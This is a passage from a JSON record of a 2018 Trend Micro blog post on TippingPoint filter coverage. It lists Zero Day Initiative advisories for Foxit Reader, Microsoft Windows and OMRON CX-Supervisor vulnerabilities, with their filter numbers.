can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Foxit (2)_**\n\n| \n\n * 31967: HTTP: Foxit Reader resolveNode Use-After-Free Vulnerability (ZDI-18-339)\n * 31969: HTTP: Foxit Reader boundItem Use-After-Free Vulnerability (ZDI-18-353) \n---|--- \n| \n \n**_Microsoft (3)_**\n\n| \n\n * 31953: HTTP: Microsoft Windows VBScript Join Function Memory Corruption Vulnerability (ZDI-18-297)\n * 31955: HTTP: Microsoft Windows Font Memory Corruption Vulnerability (ZDI-18-293)\n * 31970: HTTP: Microsoft Windows JScript defineProperty Use-After-Free Vulnerability (ZDI-18-298) \n---|--- \n| \n \n**_OMRON (1)_**\n\n| \n\n * 31965: HTTP: OMRON CX-Supervisor SCS File Parsing Buffer Overflow Vulnerability (ZDI-18-261) \n---|--- \n| \n \n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-june-4-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 11, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-june-11-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-06-15T12:39:57", "published": "2018-06-15T12:39:57", "id": "TRENDMICROBLOG:F2BD1E9071121715A43D46B35B2E97A7", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-june-11-2018/", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 11, 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
